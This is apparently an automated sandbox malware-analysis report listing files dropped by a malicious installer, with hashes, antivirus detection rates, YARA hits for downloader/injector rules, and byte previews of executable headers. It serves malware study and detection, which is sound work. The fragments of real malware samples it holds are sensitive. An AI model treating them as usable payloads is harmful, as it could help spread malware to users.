                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.7.6.<./.P.i.
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4607
                                      Entropy (8bit):4.465766562745566
                                      Encrypted:false
                                      SSDEEP:48:cvIwWl8zsAJg77aI90XWpW8VY3Ym8M4JIs8N6FK+q8M7Pl1ABHHd:uIjfGI7Sm7VbJa5X1OHHd
                                      MD5:5B6CD11868B6EDC753B56176227F9994
                                      SHA1:3A644EDD0CA71751C0555D24EE9C4B5F94AE36B7
                                      SHA-256:54A6D697CFDB3FCAA859253F7802F46F49D5EDD0981F5276A3B2E765D790624C
                                      SHA-512:802F784A4AAA9CB605867E76954D2B7F8DF0ECF61A433639465DD18E46DFC67B4AA4CBFFE29A61D4C58C7B177D56F3B1BF971270560A1A4373E3745A56B427EB
                                      Malicious:false
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="465120" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 15 streams, Wed Aug 21 08:57:23 2024, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):98068
                                      Entropy (8bit):2.2413814904543097
                                      Encrypted:false
                                      SSDEEP:384:TI/wmHPGnvL3gxdWta33xEWSMjfa3MQ9VhsU5EI4zgk2fEb+:cYkGnvzgxMt2BEWSqSp9VhTG728y
                                      MD5:8B6651545403F5C27B812C130D5819DA
                                      SHA1:41E6AC821A320E15D8D5D6E4743E65809A4ECE39
                                      SHA-256:5F2BB8635F7D6BA66FFF902F2DD529910246E4C46C44F2F601B9838CA1E225C0
                                      SHA-512:6EB8ACEAB52CBE7DAC03D03C408CB6A0EC7D66109BB3883FF4EDEFF76254FBDD70661E59CFF0E4E49E3426F0B265E2274E7C10241E630C717C030D485BE976FF
                                      Malicious:false
                                      Preview:MDMP..a..... .........f....................................$...< ......$...tB..........`.......8...........T............)..tU..........` ..........L"..............................................................................eJ......."......GenuineIntel............T.............f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8320
                                      Entropy (8bit):3.693131110688215
                                      Encrypted:false
                                      SSDEEP:192:R6l7wVeJtS6Kte6Y1U6aggmfKXpB189bmKsfCim:R6lXJ46x6Y26aggmfK6mpfO
                                      MD5:9AF27030D32EA09AB85B92DEA57E7695
                                      SHA1:11BD004B671527E68707AC7526F0446264AFBCCA
                                      SHA-256:468CE633CF0435CFCCDED7DAEE0FC7DADD76F880BE059EAF1C0B580C6B2688C1
                                      SHA-512:3B032F2FAD9320CDBE7B08C6171A90B13CC845658EC39A7701D22084BAB33F88E8671B28D23129004029B39F1D43F1C5611DBFF958CA7FAF4BD6D027D0DD7B67
                                      Malicious:false
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.7.6.<./.P.i.
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4607
                                      Entropy (8bit):4.467962957741811
                                      Encrypted:false
                                      SSDEEP:48:cvIwWl8zsAJg77aI90XWpW8VYsYm8M4JIs8N6Fr6+q8M7Pl1ABHHd:uIjfGI7Sm7V4Ja66X1OHHd
                                      MD5:A18E772A9669D22FBE9F12DDB38AEC7F
                                      SHA1:639693B7544AB8C8CB7F01FF95981F5F33A4CCD2
                                      SHA-256:48C5FE8BA39888DB626F47785CEFB927F26DEDEBF8A3A5FBA8EE39331CAC4FFA
                                      SHA-512:6769FDE07DCBB88AFCD4C52D25F0F5564FBAF369F927DDE6621AA9EB1000EA8816807CEE01A60AEBBC5F20DD730FC1A7CB0E057FCEB558684174E1E5049A08A2
                                      Malicious:false
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="465120" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                      Process:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):700
                                      Entropy (8bit):5.353797980319479
                                      Encrypted:false
                                      SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhat/DLI4M/DLI4M0kvoDLI4MWuCv:ML9E4KlKDE4KhKiKhgLE4qE4jE4Ks
                                      MD5:0787FE1F04EBDC86F7B7437F788F7785
                                      SHA1:9D584F7D0AF6008786AD80652E99C824C488EA36
                                      SHA-256:588BDC432DCE526159EDB6EE18C6CB87B7C080112C75D167E9B15D26EE03D922
                                      SHA-512:7C5C75832E1BF28026F4689028CD89D288DE4CDBB26554A80A8EBE34EE5561D63A7EC6EBB4BD58EB5EE1E9E1FC0FDBAE57D25822048F42A9BF8A504F721E6397
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                      Process:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):700
                                      Entropy (8bit):5.353797980319479
                                      Encrypted:false
                                      SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhat/DLI4M/DLI4M0kvoDLI4MWuCv:ML9E4KlKDE4KhKiKhgLE4qE4jE4Ks
                                      MD5:0787FE1F04EBDC86F7B7437F788F7785
                                      SHA1:9D584F7D0AF6008786AD80652E99C824C488EA36
                                      SHA-256:588BDC432DCE526159EDB6EE18C6CB87B7C080112C75D167E9B15D26EE03D922
                                      SHA-512:7C5C75832E1BF28026F4689028CD89D288DE4CDBB26554A80A8EBE34EE5561D63A7EC6EBB4BD58EB5EE1E9E1FC0FDBAE57D25822048F42A9BF8A504F721E6397
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):2232
                                      Entropy (8bit):5.382206187246794
                                      Encrypted:false
                                      SSDEEP:48:9WSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//YUyus:9LHyIFKL3IZ2KRH9Oug8s
                                      MD5:CD955C5C4961E1F8BD463A3447867229
                                      SHA1:31CE903E58E098AFA747468B40AC8D2FE180E8B1
                                      SHA-256:954B89F5D9BC52B908193E620AAB5538C5A3FA8771ADAE0B29EC64B757640663
                                      SHA-512:444E1ECCB355BEBB65AE56C3D7E2BEF569CE49F9908BCFC70C71CEB59488CBFAEF8A7AEF612C3CBC59D498BBB5A9E57C8AA9FD94F9F1604EDB8F80E41DDD523F
                                      Malicious:false
                                      Preview:@...e.................................~..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1229031
                                      Entropy (8bit):7.871335205612416
                                      Encrypted:false
                                      SSDEEP:24576:b062cSEk8zNlLLsZ0zlqHdHvVkOvdxG3HgdBO6RFi:A6PaUsIgRVkOvdUOBU
                                      MD5:7C6B2DC2C253C2A6A3708605737AA9AE
                                      SHA1:CF4284F29F740B4925FB2902F7C3F234A5744718
                                      SHA-256:B45C9DE845522095BBFA55166B519B2BE36A08CEA688491B9F339E862E79C3BA
                                      SHA-512:19579900D07912096641CC7381131FF6FCF60FFFC99CDAB23F7D8A577AA926BBF0E885A3A7869298BBFC0A05E276C1D5F45712812E4DF6980E9554FC48162B07
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 58%
                                      Joe Sandbox View:
                                      • Filename: 67A38378609C0EB8141A74E7BAA052B01FF5734319B4E.exe, Detection: malicious, Browse
                                      • Filename: 582BD655F491FE76A95B9C8900A3051D379DCBB86036F.exe, Detection: malicious, Browse
                                      • Filename: E4FB39B3F6AA19028CCDD531437E7994A9B6F62B317AD.exe, Detection: malicious, Browse
                                      • Filename: 6AA0D341CEE633C2783960687C79D951BF270924DF527.exe, Detection: malicious, Browse
                                      • Filename: F06154D372FA1CD4D5E9C1D5956646C9B4DD80DAB46AB.exe, Detection: malicious, Browse
                                      • Filename: 7287980C1AFB840A7438471126C0C95C36FEFA79A013F.exe, Detection: malicious, Browse
                                      • Filename: CFCAB36F73560B2D15B6C266FEAAF0195A6E0D18C22AA.exe, Detection: malicious, Browse
                                      • Filename: 822EE6C4B4BB9A619985E83C04A2DFE1A09152DC0276B.exe, Detection: malicious, Browse
                                      • Filename: ZErNFYRzCC.exe, Detection: malicious, Browse
                                      • Filename: 84B3387D512191B0764FDE9A03D827CB42FFE33D864B1.exe, Detection: malicious, Browse
                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........}.m...m...m..#.a..m..#.c..m..#.b..m....W..m...3./.m...3./.m...3./.m.......m.......m...m..nm...3./.m...3./.m...3o..m...3./.m..Rich.m..........................PE..L... .m`.................b..........0?............@.......................................@.............................4.......<............................`.. (.. ...T...........................H...@............... ............................text....a.......b.................. ..`.rdata..$............f..............@..@.data....M... ......................@....didat..\....p......................@....rsrc...............................@..@.reloc.. (...`...*..................@..B................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\09xU.exE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):485693
                                      Entropy (8bit):6.861493611111775
                                      Encrypted:false
                                      SSDEEP:12288:DT53eTAzDdjqC3RK+zJjZQhmgj+fqKbWstEB22FDz:D1uoD1R9FlL8BKb3kz
                                      MD5:4BF3493517977A637789C23464A58E06
                                      SHA1:519B1FD3DF0A243027C8CF4475E6B2CC19E1F1F4
                                      SHA-256:CCF0F8D1770436E1CD6CDCFA72D79A791A995A2F11D22BDF2B1E9BFBDD6F4831
                                      SHA-512:4D094E86E9C7D35231020D97FBCC7D0C2F748D1C22819D1D27DABBB262967800CC326911A7E5F674461D9932E244AFFE9A01FA9527F53248E5867490E0E09501
                                      Malicious:false
                                      Preview:P.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....sB*..........................................@.............................................................................. ...p...H...........x...#.......b..................................................................................CODE....d........................... ..`DATA....P...........................@...BSS......................................idata... ......."..................@....reloc...b.......d..................@..P.rsrc....H...p...H...0..............@..P..................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\09xU.exE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):129649
                                      Entropy (8bit):6.876070899801249
                                      Encrypted:false
                                      SSDEEP:3072:DlqIkb/EZrlPDKozjRIKuG+zTRn8CIj828:DBZrlLKoh5uG+zFn8CII28
                                      MD5:6C83F0423CD52D999B9AD47B78BA0C6A
                                      SHA1:1F32CBF5FDACA123D32012CBC8CB4165E1474A04
                                      SHA-256:4D61A69E27C9A8982607ACE09F0F507625F79050BDF7143C7FE0701BF1FAB8AE
                                      SHA-512:E3D1537F4B22CEADFEF3B30216B63320B397A179AB9D5F1EB66F93811A2717EE1FB6222989F610ACD4C33FAE6078C3DF510022B5748A4F1D88EBF08C12F9DEEC
                                      Malicious:false
                                      Preview:.......................p.A.....EU.6...)C...B..;C.......|.w.Z...}.Eg..N}....#.cm`)[.mJXZ.x.8..%.i...X]Uj..MQ...A..D../..>3G. ...)..(..&a.4.T.....w!.............................................%9.9{..-.7.....2.M.....JU..tL..ojo....H.I..{.\...^..f.|BhN.k..)-..q....5....N3~.V.%.: .)J~...H.B....6K.4.b.Y.8B..r...X....F..-..........................................1...8j.l.Cx........Wn....,tZ ...k.....%.>.|.b./......!.5..AVB.+}.I......5..R....S.h~o>|....-.b..b........T.:.j..a.....J.y.................................................s}V.-...x......eK.......L...g..{m.B.y.CWk......X?6W.'T..c].7`...R..@....w..H.h.....r..r.S./a.)t..W./..$e....Y_.q%..H...i............................................T._.\..5....W=..I.....R....G$d..9........e.|.@........+.[...J.S.q...R.....O....T....`..%c..+......!..?....W........)..:C=..................................................F.....Y`ebVz.im.{...l....c..0...\.B]...i?..7.$7.7.b.WvUd.6`...b.8.P..&:..R..%L..(D...O.&...M....
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):91648
                                      Entropy (8bit):6.306103157697128
                                      Encrypted:false
                                      SSDEEP:1536:k7MGKViupm7ir2Ooe+JciT1GdeYH2JaGdVtcrYxam5+s8jcduhWfM3IP:k7vYZoBPTcYYH2cG6r4J7kWU3Q
                                      MD5:37A1C118196892AA451573A142EA05D5
                                      SHA1:4144C1A571A585FEF847DA516BE8D89DA4C8771E
                                      SHA-256:A3BEFD523E1E2F4E6F8FCE281963F5EFB85FE54D85BA67746CC58823D479E92A
                                      SHA-512:AAC6321582DAC5D82CBDB197C20370DF3436CF884BEA44CBC6D156FD6C4FA99340A3FA866862B83FB0866B31A1E4EBDD73C462972BEEB299D4AF95592C1D94DB
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 68%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........u.h.&.h.&.h.&N.F&.h.&N.D&.h.&N.E&.h.&W6.'.h.&W6.'.h.&..4&.h.&W6.'.h.&..$&.h.&.h.&.h.&O6.'.h.&O6H&.h.&.h &.h.&O6.'.h.&Rich.h.&........PE..L.....ca.............................)............@.......................................@..................................J..P.......H.......................p... >..8...........................X>..@...............`............................text............................... ..`.rdata...a.......b..................@..@.data...p....`.......B..............@....gfids...............L..............@..@.rsrc...H............N..............@..@.reloc..p............T..............@..B........................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):449024
                                      Entropy (8bit):6.6805076510214105
                                      Encrypted:false
                                      SSDEEP:6144:jn1XcyLxXJLpp+g4E9lubahTKXGLFBh4j9dA0SvKLhf+2lHnBCw0qt:RvxRflMGTuIbKJdA0SvKLflHnBzN
                                      MD5:0FC8BA6DE4099DDC991EADE9B86A6F06
                                      SHA1:7B723301027C1C6979561BC60B2BE47D481C7C17
                                      SHA-256:C0658B1C3245FDF7C34D69AFD2962131243C6B615F53B0A0C85635DDBC15497A
                                      SHA-512:8C1EE3032CAE73F91D162F37DAEAEC265E2478495DF90626737C48FC523FF8E3383BA6CF5DDFAFAB24ECF134A816CA167AC3A9535CCFD3059E8374C6A27C17DF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 92%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2&.tvG.'vG.'vG.'.1Q'mG.'.1d'DG.'.1e'.G.'.?\'sG.'vG.'.G.'.1`'wG.'.1U'wG.'.1R'wG.'RichvG.'................PE..L......_.................V....(......m.......p....@.................................ZL.......................................Y..<.....,..s................... -.....0........................,.......,..@............................................text....T.......V.................. ..`.data...P.'..p.......Z..............@....tls..........,......t..............@....rsrc....s....,..t...v..............@..@.reloc....... -.....................@..B................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):8192
                                      Entropy (8bit):4.682405663673775
                                      Encrypted:false
                                      SSDEEP:96:LJOElmu1B9ilJJMOfEkdEKozt1Ex3tHfqcqkTzNt:NLkJwGE3ERtHt1
                                      MD5:C213A2444632FFDF0425E0288BCA48B9
                                      SHA1:CD4985866907BDD1F61AC637EEE7323E624D053F
                                      SHA-256:5565C7F24D0DAD9C8B874603CD5386EFD81E7FF252706AC150B20F0C2FD9ADD7
                                      SHA-512:692AFBDD4C5B20924A10446A045EABAE6E076B8711321A9DEF9A5640A5384DB8E257CBB3533143C1046B77C58715C6C48D5827804C8E80C983FF16E7B9C9C395
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe, Author: Joe Security
                                      • Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe, Author: ditekSHen
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 92%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....tda.............................4... ...@....@.. ....................................@..................................4..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................4......H.......L$..@............................................................0..........~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.~.... ....Z(....~....,.r...pr...p.(....&r...p(.....(....r...p(.......(.....(....~....&*...0..q....... ....(.....(....t......r...po.....o....t......o.....s.......o.....o.....o.....o.........,..o.....& ....(.......*.........:..W..........aa.......0..........(....o....r...p(.......(.......( ...-.(!...o"......(
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):432128
                                      Entropy (8bit):3.7368470950969326
                                      Encrypted:false
                                      SSDEEP:6144:St0hhlTEZ+iEcvpbHC7dd+63gmyFK/To5e:FhhlTEZ+iEcvpbHC7dd+63gmyFK/k5
                                      MD5:B6B87E674629A0F112CB1283B0322CCB
                                      SHA1:F35F95A13C24D07460D7A4C14D20D27B2E202539
                                      SHA-256:64BD25466E41DF79BBF715E4E068829F58CAB364283AB1D0BAAEBF957C836899
                                      SHA-512:D5704D375CE6578B7B4C83FE5B8778AE0D8C596ED5ADB533A4CA42A1F05FDF40FC0C90D3E6E10C0AD738EE1E3F6D7264E64826401B7321FC46B4DF32EAC45079
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 81%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.W...............0.............^.... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................@.......H......../...3...........................................................0..........~....u....s....z&.....*.................2(.... e...j*....r...p(....*.s....%.}..........s....o....9....s....z*....(.........*2.s....(....*...v.(......r...p~....o....(....*....{....*.0..i........:....~........(......~....:$.........(.........(....(....(.........~....{....~.....o....(....o....}....*....0...........o......o....(.....(.....o....*.6..(....(....*...0..A.......~.....s.......8.........
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):64000
                                      Entropy (8bit):6.92354142826486
                                      Encrypted:false
                                      SSDEEP:768:9DTH3hg+oJrVGPZuVTNOTgmecxbDwf2F5ISJQF65e/yRALOxMYYG1A8RnBbEOp0/:9DDloThmecxbDssrJQ6k/05DhOjOV3v
                                      MD5:D082843D4E999EA9BBF4D89EE0DC1886
                                      SHA1:4E2117961F8DAC71DDE658A457FB6A56D5A6F1AA
                                      SHA-256:0F3822EFA9FA3FCB532A043DF68175865ECA68A2805B1415D0D89DE69A49628B
                                      SHA-512:B51811D489636B6266131452F7CB0BF294D855F1BAAA078894051CD19169C2B3E4496E46026C2B2B375F979619E4F8D2F939F05FC9E8FC888A836C01586DB2CA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 81%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0......h.......`....... ....@.. ...............................q....@.................................`...K.... .......................@.......................................................`..................H...........[$vd.Pf#.M... ...N..................@....text................R.............. ..`.rsrc........ ......................@..@.reloc.......@......................@..B.............`...................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):439808
                                      Entropy (8bit):6.571863080131404
                                      Encrypted:false
                                      SSDEEP:12288:mUEg0pPvwCCCNUZDBL+MlU43opBzcWzuuZVY6:mdvpnwJXBaMx3opBVu
                                      MD5:ECC773623762E2E326D7683A9758491B
                                      SHA1:AD186C867976DC5909843418853D54D4065C24BA
                                      SHA-256:8F97A40B4D9CF26913AB95EEC548D75A8DAD5A1A24D992D047E080070282D838
                                      SHA-512:40E30981F533B19123EC3D84276A28ACD282C01907398CA6D67155901CFAF2C2D6355DC708D0ECFC6C21B5C671B4C3BB87EEB53183B7085474A2ACD302F038A4
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 84%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w..$..$..$. $..$..$..$..$..$..-$..$..$..$..$..$.$$..$.#$..$Rich..$........PE..L.....K`.................^...X(......O.......p....@..................................(.......................................a..d.....,..A....................-.."..`...................................@............................................text....].......^.................. ..`.data....1'..p... ...b..............@....rsrc....A....,..B..................@..@.reloc........-.....................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):412160
                                      Entropy (8bit):5.487293211993093
                                      Encrypted:false
